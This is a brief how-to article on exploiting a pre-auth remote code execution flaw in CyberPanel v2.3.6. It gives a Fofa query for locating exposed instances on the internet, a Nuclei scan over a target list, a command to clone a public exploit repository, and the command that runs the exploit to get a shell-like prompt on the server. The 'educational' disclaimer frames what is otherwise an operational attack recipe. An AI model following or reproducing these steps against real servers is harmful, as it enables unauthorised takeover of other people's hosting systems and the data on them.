CyberPanel is a popular open-source control panel for managing web hosting servers, built on top of OpenLiteSpeed. Recently, a critical vulnerability was found in CyberPanel v2.3.6, which allows remote attackers to achieve pre-auth RCE.
Disclaimer
This article is for educational purposes only. Unauthorized exploitation of vulnerabilities is illegal and unethical. Use this guide only within a safe and legal environment, or with explicit permission from the system owner.
Step 1: Identifying Vulnerable CyberPanel Instances
To find CyberPanel instances potentially vulnerable to RCE, you can use Fofa with the following query:
app="CyberPanel"Step 2: Detect CyberPanel RCE with Nuclei
ProjectDiscovery’s Nuclei tool provides a template to detect this specific vulnerability. Use the following template to scan potential targets:
- Template:
cyberpanel-rce - Nuclei Cloud Link: https://cloud.projectdiscovery.io/?template=cyberpanel-rce
Run the detection template in Nuclei as follows:
nuclei -l cyberpanel.txt -t cyberpanel-rce.yaml
Step 3: Cloning the Exploit Repository
The exploit script for CyberPanel v2.3.6 is available on GitHub. Clone the repository to get started:
git clone https://github.com/DreyAnd/CyberPanel-RCE
cd CyberPanel-RCEStep 4: Executing the Exploit
Run the script with the target URL. Replace https://192.168.0.120:8090/ with the IP or URL of the CyberPanel instance:
python3 cyberpanel-rce.py https://192.168.0.120:8090/The script will prompt you for a command to execute on the server:
$> whoami
